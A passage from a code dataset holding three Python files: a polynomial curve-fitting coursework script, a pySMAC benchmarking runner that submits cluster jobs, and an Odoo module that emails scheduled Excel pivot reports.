np\nimport matplotlib.pyplot as plt\nimport scipy\nimport scipy.io\nimport math\n\n# Seed a random number generator\nseed = 12345\n# rng = np.random.RandomState(seed)\n\n'''\nEXERCISE 1\n'''\ndef process_data():\n amp_data = scipy.io.loadmat('amp_data.mat')\n amp_data_keys = amp_data['amp_data']\n # print(amp_data_keys)\n\n # x_grid = np.arange(start=0, stop=len(amp_data_keys), step=1)\n # plt.plot(x_grid, amp_data_keys,'b-') # linear plot\n # plt.hist(amp_data_keys, normed=True, bins=16) # histogram\n # plt.show()\n\n columns = 21\n rows = len(amp_data_keys) // columns\n data_set = amp_data_keys[:(rows*columns)]\n data_set = data_set.reshape((rows, columns))\n shuffled_data_set = shuffle_matrix(data_set)\n\n print (len(amp_data_keys))\n print 
(len(data_set))\n\n X_shuffle_train, X_shuffle_val, X_shuffle_test, y_shuffle_train, y_shuffle_val, y_shuffle_test = split_data(data=shuffled_data_set)\n\n print (X_shuffle_train.shape)\n print (X_shuffle_val.shape)\n print (X_shuffle_test.shape)\n\n print (y_shuffle_train.shape)\n print (y_shuffle_val.shape)\n print (y_shuffle_test.shape)\n\n '''\n EXERCISE 2\n '''\n # fit_curve(X=X_shuffle_train[0], yy=y_shuffle_train[0])\n\n '''\n EXERCISE 3\n '''\n choose_polynomial(X=X_shuffle_train[0], yy=y_shuffle_train[0])\n\n\n\n # q = [12, 232, 34, 323, 421, 544, 63, 23, 75, 6833, 5324, 453, 34, 31, 797, 313, 1213, 89]\n # q = np.array(q).reshape(6,3)\n # for i in range(3):\n # sh = shuffle_matrix(q)\n # print (sh)\n\n\n # # Reset random number generator and data provider states on each run\n # # to ensure reproducibility of results\n # rng.seed(seed)\n # train_data.reset()\n # valid_data.reset()\n\n\n\n# Split data into training, validation and test sets\ndef split_data(data):\n p = math.floor(len(data) / 20 * 3) # 15% (validation set / testing set)\n r = len(data) - 2 * p # 70% (training set)\n\n training_data = (data[:r]) # training_data\n validation_data = (data[r:r+p]) # validation_data\n testing_data = (data[r+p:r+p+p]) # testing_data\n\n X_shuffle_train = training_data[:,:-1]\n y_shuffle_train = training_data[:,-1]\n\n X_shuffle_val = validation_data[:,:-1]\n y_shuffle_val = validation_data[:,-1]\n\n X_shuffle_test = testing_data[:,:-1]\n y_shuffle_test = testing_data[:,-1]\n\n return X_shuffle_train, X_shuffle_val, X_shuffle_test, y_shuffle_train, y_shuffle_val, y_shuffle_test\n\n\ndef shuffle_matrix(mat):\n np.random.seed(seed)\n shuffled_mat = np.random.permutation(mat)\n\n # print (mat)\n # print (shuffled_mat)\n return shuffled_mat\n\n\ndef fit_and_plot(phi_fn, type, X, yy, last_point, draw_type, D):\n w_fit = np.linalg.lstsq(phi_fn(X), yy, rcond=0)[0] # (D+1,)\n X_grid = np.arange(start=0, stop=1, step=0.05).reshape(-1, D) # (N, 1)\n f_grid = np.dot(phi_fn(X_grid), w_fit) # (N,)\n\n\n # evaluate the fitted basis expansion at the prediction point (valid for both the linear and quartic bases)\n est_value = np.dot(phi_fn(np.array([[last_point[0]]], dtype=float)), w_fit)[0]\n print (\"Estimated value for\", type, \":\", est_value[0])\n\n # plt.clf()\n plt.plot(X, yy, 'r.')\n plt.plot(last_point[0], last_point[1], 'b.')\n plt.plot(X_grid, f_grid, draw_type)\n # plt.show()\n\ndef phi_linear(X_in):\n return np.insert(X_in, 0, 1, axis=-1)\n\ndef phi_quartic(X_in):\n return np.concatenate([np.ones(X_in.shape), X_in, X_in**2, X_in**3, X_in**4], axis=-1)\n\n'''\nEXERCISE 2\n'''\ndef fit_curve(X, yy):\n X = X.reshape(20,1)\n yy = yy.reshape(1,1)\n D = X.shape[1] # N = 20, D = 1\n\n # y_data = X # (N, D) - (20, 1)\n t = np.arange(start=0, stop=1, step=0.05).reshape(-1, D) # (N, D) - (20, 1)\n # print (\"T: \", t)\n # x_data = np.insert(t, 0, np.ones(t.shape[0]), axis=1) # (N, D+1) - (20, 2)\n #\n # # print (\"X: \", X.shape)\n # # print (\"Y: \", yy.shape)\n # w_fit = np.linalg.lstsq(x_data, y_data)[0] # (D,)\n # # X_grid = np.arange(start=0, stop=1, step=0.05).reshape(-1, D) # (N, D)\n # # f_grid = np.dot(X_grid, w_fit) # (N,)\n # plt.clf()\n # plt.plot(t, y_data, 'r.')\n # # plt.ylim(-0.210540, -0.210530)\n # plt.show()\n\n print (\"Expected value: \", yy[0][0])\n\n print (\"USING ALL DATA\")\n plt.clf()\n fit_and_plot(phi_fn=phi_linear, type='linear', X=t, yy=X, last_point=(1, yy[0]), draw_type='g-', D=D)\n fit_and_plot(phi_fn=phi_quartic, type='quartic', X=t, yy=X, last_point=(1, yy[0]), draw_type='y-', D=D)\n plt.show()\n\n print (\"USING JUST THE LAST TWO POINTS\")\n plt.clf()\n fit_and_plot(phi_fn=phi_linear, 
type='linear', X=t[-2:], yy=X[-2:], last_point=(1, yy[0]), draw_type='g-', D=D)\n fit_and_plot(phi_fn=phi_quartic, type='quartic', X=t[-2:], yy=X[-2:], last_point=(1, yy[0]), draw_type='y-', D=D)\n plt.show()\n\n\ndef Phi(C, K, t):\n def phi(X_in, C, K):\n arr = np.ones((C, 1))\n for i in range(K):\n arr = np.hstack((arr, X_in**(i+1)))\n return arr\n\n res = phi(t, C, K)\n print (res)\n return res\n\n\n'''\nEXERCISE 3\n'''\ndef choose_polynomial(X, yy):\n X = X.reshape(20,1)\n D = X.shape[1]\n t = np.arange(start=0, stop=1, step=0.05).reshape(-1, D)\n # Phi expects (C, K, t), where C is the number of rows in t and K is the polynomial degree\n Phi(t.shape[0], 4, t)\n\n\n\n\n\nif __name__ == '__main__':\n process_data()\n", "sub_path": "assignment1.py", "file_name": "assignment1.py", "file_ext": "py", "file_size_in_byte": 5228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "scipy.io.loadmat", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 15, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.linalg.lstsq", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "numpy.insert", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "514182315", "text": "'''\n\npySMAC 0.9.1 Installation:\n\nURL: https://github.com/automl/pysmac\nINSTALLATION: pip install git+https://github.com/automl/pysmac.git --user\n'''\n\nimport os\nimport sys\nimport copy\nimport types\nimport random\nimport 
pysmac\nimport itertools\nimport subprocess\nimport scipy.stats\nimport numpy as np\nimport portable_pal as pal\n\nif sys.version_info[0] == 2:\n import cPickle as pickle\nelif sys.version_info[0] == 3:\n import _pickle as pickle\nelse:\n raise Exception(\"Error - Unknown python version!\")\n\n\ndef f_min_obj_2(x0, x1, x2):\n return f_min_obj([x0, x1, x2])\n\n\ndef f_min_obj(x_int):\n # The actual function we are optimizing. As we are minimizing,\n # and all data is actually the negated be, we need to return\n # the negative of the actually stored value\n data_x, data_y, combos, solvent_dict = f_min_obj.func_data\n index = f_min_obj.index\n\n x2 = solvent_dict[x_int[2]]\n\n sample = combos[x_int[0]] + [int(x_int[1]), int(x2)]\n\n for i, d in enumerate(data_x):\n if all([x == y for x, y in zip(sample, d)]):\n v = 1.0 * data_y[i]\n os.system(\"echo %f >> tmp_%d.dat\" % (v, index))\n return -1.0 * v\n\n raise Exception(\"NOT FOUND\")\n\n\ndef run_replication(index, x0, x1, x2, N_POINTS, func_data):\n # Setup and run our replication\n parameters = {\n \"x0\": (\"categorical\", x0, random.randint(0, 9)),\n \"x1\": (\"categorical\", x1, random.randint(0, 2)),\n \"x2\": (\"categorical\", x2, random.choice(x2))\n }\n if os.path.exists(\"tmp_%d.dat\" % index):\n os.remove(\"tmp_%d.dat\" % index)\n opt = pysmac.SMAC_optimizer()\n f_min_obj.func_data = func_data\n f_min_obj.index = index\n\n xmin, fval = opt.minimize(f_min_obj_2, N_POINTS, parameters)\n\n best_y = [float(s) for s in open(\"tmp_%d.dat\" % index).read().strip().split('\\n')]\n\n os.remove(\"tmp_%d.dat\" % index)\n # Assuming there is a possibility of converging sooner than all datapoints,\n # we will pad the ending of best_y with the best observed so far\n if len(best_y) != N_POINTS:\n best_y = best_y + [max(best_y) for _ in range(N_POINTS - len(best_y))]\n\n return best_y\n\n\ndef submit_job(run):\n '''\n This code will submit a job to the NBS queueing system so we can run our\n benchmarks in parallel!\n '''\n # Python script to run our replication\n py_script = '''\nfrom run_pysmac import run_replication\nimport cPickle as pickle\n\ndata = pickle.load(open(\"queue_helper/$INDEX_pysmac.pickle\", 'rb'))\nbest_y = run_replication(*data)\n\npickle.dump(best_y, open(\"queue_helper/$INDEX_rep.out\", 'wb'))\n'''\n fptr = open(\"%d_rep.py\" % run, 'w')\n fptr.write(py_script.replace(\"$INDEX\", str(run)))\n fptr.close()\n\n # Submission script for this job (NBS)\n sub_script = '''\n##NBS-name: \"$INDEX_rep\"\n##NBS-nproc: 1\n##NBS-queue: \"bigmem\"\n\nsource /fs/home/$USER/.zshrc\n\n/fs/home/hch54/anaconda/bin/python2.7 -u $CUR_DIR/$INDEX_rep.py > $CUR_DIR/$INDEX_rep.log 2>&1\n'''\n while \"$INDEX\" in sub_script:\n sub_script = sub_script.replace(\"$INDEX\", str(run))\n while \"$CUR_DIR\" in sub_script:\n sub_script = sub_script.replace(\"$CUR_DIR\", os.getcwd())\n name = \"%d_rep\" % run\n fptr = open(\"%s.nbs\" % name, 'w')\n fptr.write(sub_script)\n fptr.close()\n\n # Submit job\n job_pipe = subprocess.Popen('jsub %s.nbs' % name, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n job_err = job_pipe.stderr.read()\n\n if \"+notunique:\" in job_err:\n raise Exception(\"Job with name %s already exists in the queue!\" % name)\n\n job_id = job_pipe.stdout.read()\n job_id = job_id.split(\"submitted to queue\")[0].split()[-1][2:-1]\n running_job = pal.Job(name, job_id=job_id)\n\n # Here we define a function to attach to the job class.\n def get_best_y(self):\n if not self.is_finished():\n self.wait()\n\n return 
pickle.load(open(\"queue_helper/%s.out\" % self.name, 'rb'))\n\n # Attach the function\n running_job.get_best_y = types.MethodType(get_best_y, running_job)\n\n return running_job\n\n\ndef run_pysmac(dataset, stats, NUM_RUNS=1000, on_queue=False):\n # -------------------------------------------------------------------------------------------------\n\n # Off-the-shelf BO (EI with GP model, no statistical model though)\n # http://www.jmlr.org/papers/volume16/neumann15a/neumann15a.pdf\n\n # Read in all the data points\n data = pickle.load(open(\"all_data.pickle\", 'rb'))\n N_POINTS = len(data)\n\n data_x = [\n [row.index(1), row[3:].index(1), row[6:].index(1), row[9:].index(1), row[-2]]\n for row in data\n ]\n data_y = [row[-1] for row in data]\n combos = sorted([list(x) for x in list(set([tuple(sorted(v)) for v in itertools.product(range(3), repeat=3)]))])\n\n solvent_dict = {\n 46.7: 0,\n 36.7: 1,\n 32.3: 2,\n 40.24: 3,\n 20.7: 4,\n 10.9: 5,\n 42.84: 6,\n 35.9: 7\n }\n\n func_data = [data_x, data_y, combos, solvent_dict]\n\n # Ensure folders are as they should be\n if on_queue:\n if not os.path.isdir(\"queue_helper\"):\n os.mkdir(\"queue_helper\")\n else:\n os.system(\"rm queue_helper/*\")\n\n # -------------------------------------------------------------------------------------------------\n\n each_run = []\n\n # Initialize our variable ranges\n x0 = list(range(10))\n x1 = list(range(3))\n x2 = sorted(solvent_dict.keys())\n\n # Run all replications\n jobs_on_queue = []\n for i in range(NUM_RUNS):\n dump_obj = [i, x0, x1, x2, N_POINTS, func_data]\n if not on_queue:\n pal.printProgressBar(i, NUM_RUNS, prefix=\"Running pySMAC case...\")\n best_y = run_replication(*dump_obj)\n each_run.append(best_y)\n else:\n pickle.dump(dump_obj, open(\"queue_helper/%d_pysmac.pickle\" % i, 'wb'))\n jobs_on_queue.append(submit_job(i))\n\n if on_queue:\n for run, j in enumerate(jobs_on_queue):\n pal.printProgressBar(run, NUM_RUNS, prefix=\"Running pySMAC case...\")\n\n best_y = j.get_best_y()\n each_run.append(copy.deepcopy(best_y))\n\n # Delete the old files\n os.system(\"rm %d_rep.*\" % run)\n\n # Parse the output data\n all_runs = [\n [max(r[:i + 1]) if i > 0 else x for i, x in enumerate(r)]\n for r in each_run\n ]\n\n n_to_max = []\n for this_run in all_runs:\n n_to_max.append(this_run.index(max(this_run)))\n\n each_run = np.array(all_runs)\n\n dataset[\"SMAC\"] = [\n np.array([np.mean(each_run[:, i]) for i in range(N_POINTS)]),\n np.array([scipy.stats.sem(each_run[:, i]) for i in range(N_POINTS)])\n ]\n\n stats[\"SMAC\"] = [n_to_max, N_POINTS]\n\n # Save all output\n pickle.dump(dataset[\"SMAC\"], open(\"out/d_smac.dat\", 'wb'))\n pickle.dump(each_run, open(\"out/best_smac.dat\", 'wb'))\n\n pal.printProgressBar(NUM_RUNS, NUM_RUNS, prefix=\"Running pySMAC case...\", suffix=\"Done\")\n return dataset, stats\n\n\nif __name__ == \"__main__\":\n print(\"Running pySMAC for only one replication! 
If you wish to do a full run, please use the run.py code.\")\n dataset, stats = run_pysmac({}, {}, NUM_RUNS=1, on_queue=False)\n", "sub_path": "code/run_pysmac.py", "file_name": "run_pysmac.py", "file_ext": "py", "file_size_in_byte": 7176, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.version_info", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 47, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 57, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 61, "usage_type": "call"}, {"api_name": "pysmac.SMAC_optimizer", "line_number": 62, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 70, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 111, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 118, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "portable_pal.Job", "line_number": 126, "usage_type": "call"}, {"api_name": "_pickle.load", "line_number": 133, "usage_type": "call"}, {"api_name": "types.MethodType", "line_number": 136, "usage_type": "call"}, {"api_name": "_pickle.load", "line_number": 148, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 174, "usage_type": "call"}, {"api_name": "os.system", "line_number": 176, "usage_type": "call"}, {"api_name": "portable_pal.printProgressBar", "line_number": 192, "usage_type": "call"}, {"api_name": "_pickle.dump", "line_number": 196, "usage_type": "call"}, {"api_name": "portable_pal.printProgressBar", "line_number": 201, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 204, "usage_type": "call"}, {"api_name": "os.system", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 223, "usage_type": "call"}, {"api_name": "scipy.stats.stats.sem", "line_number": 223, "usage_type": "call"}, {"api_name": "scipy.stats.stats", "line_number": 223, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 223, "usage_type": "name"}, {"api_name": "_pickle.dump", "line_number": 229, "usage_type": "call"}, {"api_name": "_pickle.dump", "line_number": 230, "usage_type": "call"}, {"api_name": "portable_pal.printProgressBar", "line_number": 232, "usage_type": "call"}]} +{"seq_id": "18148498", "text": "# -*- coding: utf-8 -*-\nimport StringIO\nfrom collections import deque\nfrom odoo.tools import config\nfrom datetime import datetime, timedelta\nfrom odoo import models, fields, api, SUPERUSER_ID\nfrom odoo.tools import ustr\nimport os\n\ntry:\n import xlwt\nexcept ImportError:\n xlwt = None\n\nclass auto_send_report(models.Model):\n _name 
= 'auto_send_report.config'\n\n @api.model\n def _list_all_models(self):\n self.env.cr.execute(\"\"\"\n SELECT\n model, name\n FROM\n ir_model\n WHERE\n transient = False\n ORDER BY\n name\n \"\"\")\n return self.env.cr.fetchall()\n\n reporting_id = fields.Selection(_list_all_models, string='Reporting', required=True)\n filter_id = fields.Many2one('ir.filters', string='Filter', required=True)\n measure_ids = fields.Many2many('ir.model.fields', domain=[('name','!=','id'),'|',('ttype','=','float'),('ttype','=','integer')], string='Measures', required=True)\n recipient_ids = fields.Many2many('res.partner', string='Recipients', domain=[('email', '!=', False)], required=True)\n sending_frequency = fields.Selection([\n ('daily', 'Daily'),\n ('weekly', 'Weekly'),\n ('monthly', 'Monthly'),\n ], string='Sending Frequency', required=True)\n next_date = fields.Date('Next Date', required=True, default= lambda self: fields.Date.today())\n\n @api.multi\n def run_scheduler_send(self):\n allow_send_ids = []\n\n reports = self.search([])\n for report in reports:\n if not report.next_date:\n allow_send_ids.append(report.id)\n else:\n next_date = datetime.strptime(report.next_date, '%Y-%m-%d')\n today = datetime.strptime(fields.Date.today(), '%Y-%m-%d')\n\n timediff = next_date - today\n if timediff.total_seconds() <= 0:\n allow_send_ids.append(report.id)\n if len(allow_send_ids) > 0:\n allowes = self.browse(allow_send_ids)\n allowes.sending_report()\n allowes.update_next_time()\n return True\n\n @api.multi\n def update_next_time(self):\n for report in self:\n today = datetime.strptime(fields.Date.today(), '%Y-%m-%d')\n\n delta = timedelta(days=+1)\n if report.sending_frequency == 'weekly':\n delta = timedelta(days=+7)\n elif report.sending_frequency == 'monthly':\n delta = timedelta(days=+30) # datetime.timedelta has no 'months' argument; approximate one month as 30 days\n\n next_date = today + delta\n report.write({\n 'next_date': next_date.strftime('%Y-%m-%d')\n })\n\n @api.multi\n def sending_report(self):\n for report in self:\n report_data = report.get_report_data()\n excel_path = self.export_xls(report_data)\n report.send_email(excel_path)\n return True\n\n @api.model\n def build_data(self):\n return {\n 'headers': self.build_headers(),\n 'measure_row': self.build_measure_row(),\n 'nbr_measures': self.get_measure_lenth(),\n 'rows': self.build_rows(),\n 'title': self.reporting_id,\n }\n\n @api.model\n def build_headers(self):\n report_obj = self.env.get(self.reporting_id)\n\n filter_context = eval(self.filter_id.context)\n if not filter_context:\n filter_context = {}\n\n pivot_measures = filter_context.get('pivot_measures', [])\n pivot_row_groupby = filter_context.get('pivot_row_groupby', [])\n pivot_column_groupby = filter_context.get('pivot_column_groupby', [])\n\n fields = []\n for measure in pivot_measures:\n fields.append(measure.split(':')[0])\n for row in pivot_row_groupby:\n fields.append(row.split(':')[0])\n for column in pivot_column_groupby:\n fields.append(column.split(':')[0])\n\n domain = eval(self.filter_id.domain)\n if not domain:\n domain = []\n\n measures = []\n group_labels = []\n for group_field in pivot_column_groupby:\n group_data = report_obj.read_group(domain=domain, fields=fields, groupby=[group_field])\n for group_item in group_data:\n for measure in pivot_measures:\n if measure == '__count__':\n measures.append({\n 'width': 1,\n 'height': 1,\n 'title': 'count',\n # 'id': '2216',\n 'expanded': False\n })\n else:\n measures.append({\n 'width': 1,\n 'height': 1,\n 'title': measure,\n # 'id': '2216',\n 'expanded': False\n })\n group_label = 
group_item.get(group_field)\n if not group_label:\n group_label = 'Undefined'\n if type(group_label) == type(list()) or type(group_label) == type(tuple()):\n group_label = group_label[1]\n group_labels.append({\n 'width': len(pivot_measures),\n 'height': 1,\n 'title': group_label,\n # 'id': '2216',\n 'expanded': False\n })\n totals = []\n for measure in pivot_measures:\n if measure == '__count__':\n totals.append({\n 'width': 1,\n 'height': 1,\n 'title': 'count',\n # 'id': '2216',\n 'expanded': False\n })\n else:\n totals.append({\n 'width': 1,\n 'height': 1,\n 'title': measure,\n # 'id': '2216',\n 'expanded': False\n })\n return [[{\n 'width': len(measures),\n 'height': 1,\n 'title': 'Total',\n 'id': '2216',\n 'expanded': False\n }, {\n 'width': len(totals),\n 'height': len(pivot_column_groupby),\n 'title': '',\n 'id': '2216',\n 'expanded': False\n }], group_labels, measures + totals]\n\n @api.model\n def build_measure_row(self):\n result = []\n for measure in self.measure_ids:\n if measure.name:\n result.append({\n 'text': measure.field_description,\n 'is_bold': True\n })\n return result\n\n @api.model\n def get_measure_lenth(self):\n return len(self.measure_ids)\n\n @api.model\n def build_rows(self):\n result = []\n report_obj = self.env.get(self.reporting_id)\n\n filter_context = eval(self.filter_id.context)\n if not filter_context:\n filter_context = {}\n\n pivot_measures = filter_context.get('pivot_measures', [])\n pivot_row_groupby = filter_context.get('pivot_row_groupby', [])\n pivot_column_groupby = filter_context.get('pivot_column_groupby', [])\n\n fields = []\n for measure in pivot_measures:\n fields.append(measure.split(':')[0])\n for row in pivot_row_groupby:\n fields.append(row.split(':')[0])\n for column in pivot_column_groupby:\n fields.append(column.split(':')[0])\n\n domain = eval(self.filter_id.domain)\n if not domain:\n domain = []\n\n index = 0\n values = []\n table_data = {}\n table_index = []\n for group_field in pivot_column_groupby:\n group_data = report_obj.read_group(domain=domain, fields=fields, groupby=[group_field])\n for group_item in group_data:\n group_id = group_item.get(group_field)\n if type(group_id) == type(list()) or type(group_id) == type(tuple()):\n group_id = group_id[0]\n for measure in pivot_measures:\n table_index.append({\n 'id': group_id,\n 'measure': measure,\n 'index': index\n })\n if measure == '__count__':\n table_data[index] = {\n 'value': group_item.get('%s_count' %(group_field,)),\n }\n else:\n table_data[index] = {\n 'value': group_item.get(measure),\n }\n index = index + 1\n total_data = report_obj.read_group(domain=domain, fields=fields, groupby=[])\n for total_item in total_data:\n for measure in pivot_measures:\n table_index.append({\n 'id': 'root',\n 'measure': measure,\n 'index': index\n })\n if measure == '__count__':\n table_data[index] = {\n 'value': total_item.get('__count')\n }\n else:\n table_data[index] = {\n 'value': total_item.get(measure)\n }\n index = index + 1\n\n for table_item in table_index:\n index = table_item.get('index')\n values.append(table_data.get(index))\n\n result.append({\n # 'id': '2215',\n 'indent': 0,\n 'title': 'Total',\n 'expanded': True,\n 'values': values\n })\n\n if pivot_row_groupby:\n result += self._build_rows(table_index, domain, fields, pivot_column_groupby, pivot_measures, pivot_row_groupby)\n\n return result\n\n @api.model\n def _get_index_from_table(self, table_index, id, measure):\n index = 0\n for table_item in table_index:\n if table_item.get('id') == id and table_item.get('measure') 
== measure:\n index = table_item.get('index')\n return index\n\n @api.model\n def _build_rows(self, table_index, domain, fields, columns, measures, rows, field_index=0):\n result = []\n report_obj = self.env.get(self.reporting_id)\n if field_index < len(rows):\n group_field = rows[field_index]\n total_data = report_obj.read_group(domain=domain, fields=fields, groupby=[group_field])\n\n for total_item in total_data:\n new_domain = total_item.get('__domain')\n values = []\n table_data = {}\n for table_item in table_index:\n index = table_item.get('index')\n table_data[index] = {'value': 0}\n for column in columns:\n group_data = report_obj.read_group(domain=new_domain, fields=fields, groupby=[column])\n for group_item in group_data:\n group_id = group_item.get(column)\n if type(group_id) == type(list()) or type(group_id) == type(tuple()):\n group_id = group_id[0]\n for measure in measures:\n index = self._get_index_from_table(table_index, group_id, measure)\n if measure == '__count__':\n table_data[index] = {\n 'value': group_item.get('%s_count' %(column,))\n }\n else:\n table_data[index] = {\n 'value': group_item.get(measure)\n }\n for measure in measures:\n index = self._get_index_from_table(table_index, 'root', measure)\n if measure == '__count__':\n table_data[index] = {\n 'value': total_item.get('%s_count' %(group_field.split(':')[0],))\n }\n else:\n table_data[index] = {\n 'value': total_item.get(measure)\n }\n\n for table_item in table_index:\n index = table_item.get('index')\n values.append(table_data.get(index))\n\n if total_item.get(group_field):\n field_label = total_item.get(group_field)\n if type(field_label) == type(list()) or type(field_label) == type(tuple()):\n result.append({\n # 'id': '2215',\n 'indent': field_index + 1,\n 'title': field_label[1],\n 'expanded': True,\n 'values': values\n })\n else:\n result.append({\n # 'id': '2215',\n 'indent': field_index + 1,\n 'title': field_label,\n 'expanded': True,\n 'values': values\n })\n else:\n result.append({\n # 'id': '2215',\n 'indent': field_index + 1,\n 'title': 'Undefined',\n 'expanded': True,\n 'values': values\n })\n result += self._build_rows(table_index, new_domain, fields, columns, measures, rows, field_index + 1)\n\n return result\n\n @api.model\n def get_report_data(self):\n data = self.build_data()\n return data\n\n @api.model\n def get_email_template(self):\n return self.env.ref('auto_send_report.auto_report_template')\n\n @api.multi\n def send_email(self, excel_path):\n self.sudo()._send_email(excel_path)\n\n @api.multi\n def _send_email(self, excel_path):\n for report in self:\n result = False\n # email_obj = self.pool.get('mail.template')\n template = self.get_email_template()\n\n email_to = []\n for recipient in report.recipient_ids:\n if recipient.email:\n email_to.append(recipient.email)\n email_to = ','.join(email_to)\n\n excel_data = ''\n with open(excel_path, 'r') as file: # Use file to refer to the file object\n data = file.read()\n excel_data += data\n\n filename = 'report.xls'\n attachment = self.env.get('ir.attachment').create({\n 'name': filename,\n 'res_name': filename,\n 'type': 'binary',\n 'datas_fname': filename,\n 'datas': excel_data.encode('base64'),\n 'mimetype': 'application/vnd.ms-excel',\n })\n\n if email_to:\n template.write({\n 'email_to': email_to,\n 'attachment_ids': [(6, 0, [attachment.id])]\n })\n result = template.send_mail(report.id, True)\n return result\n\n @api.model\n def export_xls(self, jdata):\n nbr_measures = jdata['nbr_measures']\n workbook = xlwt.Workbook()\n worksheet = 
workbook.add_sheet(jdata['title'][:30])\n header_bold = xlwt.easyxf(\"font: bold on; pattern: pattern solid, fore_colour gray25;\")\n header_plain = xlwt.easyxf(\"pattern: pattern solid, fore_colour gray25;\")\n bold = xlwt.easyxf(\"font: bold on;\")\n\n # Step 1: writing headers\n headers = jdata['headers']\n\n # x,y: current coordinates\n # carry: queue containing cell information when a cell has a >= 2 height\n # and the drawing code needs to add empty cells below\n x, y, carry = 1, 0, deque()\n for i, header_row in enumerate(headers):\n worksheet.write(i,0, '', header_plain)\n for header in header_row:\n while (carry and carry[0]['x'] == x):\n cell = carry.popleft()\n for i in range(nbr_measures):\n worksheet.write(y, x+i, '', header_plain)\n if cell['height'] > 1:\n carry.append({'x': x, 'height':cell['height'] - 1})\n x = x + nbr_measures\n style = header_plain if 'expanded' in header else header_bold\n for i in range(header['width']):\n worksheet.write(y, x + i, header['title'] if i == 0 else '', style)\n if header['height'] > 1:\n carry.append({'x': x, 'height':header['height'] - 1})\n x = x + header['width'];\n while (carry and carry[0]['x'] == x):\n cell = carry.popleft()\n for i in range(nbr_measures):\n worksheet.write(y, x+i, '', header_plain)\n if cell['height'] > 1:\n carry.append({'x': x, 'height':cell['height'] - 1})\n x = x + nbr_measures\n x, y = 1, y + 1\n\n # Step 2: measure row\n if nbr_measures > 1:\n worksheet.write(y,0, '', header_plain)\n for measure in jdata['measure_row']:\n style = header_bold if measure['is_bold'] else header_plain\n worksheet.write(y, x, measure['text'], style);\n x = x + 1\n y = y + 1\n\n # Step 3: writing data\n x = 0\n for row in jdata['rows']:\n worksheet.write(y, x, row['indent'] * ' ' + ustr(row['title']), header_plain)\n for cell in row['values']:\n x = x + 1\n if cell.get('is_bold', False):\n worksheet.write(y, x, cell['value'], bold)\n else:\n worksheet.write(y, x, cell['value'])\n x, y = 0, y + 1\n\n filepath = self.get_tmp_path('report.xls')\n workbook.save(filepath)\n\n return filepath\n\n @api.model\n def get_tmp_path(self, filename):\n return os.path.join(config['data_dir'], 'filestore', self.env.cr.dbname, filename)\n\n def get_data_dir(self):\n return config['data_dir']\n\n @api.onchange('reporting_id')\n def _onchange_reporting_id(self):\n result = {}\n if self.reporting_id:\n self.filter_id = False\n self.measure_ids = []\n result = {\n 'domain': {\n 'filter_id': [('model_id','=',self.reporting_id)],\n 'measure_ids': 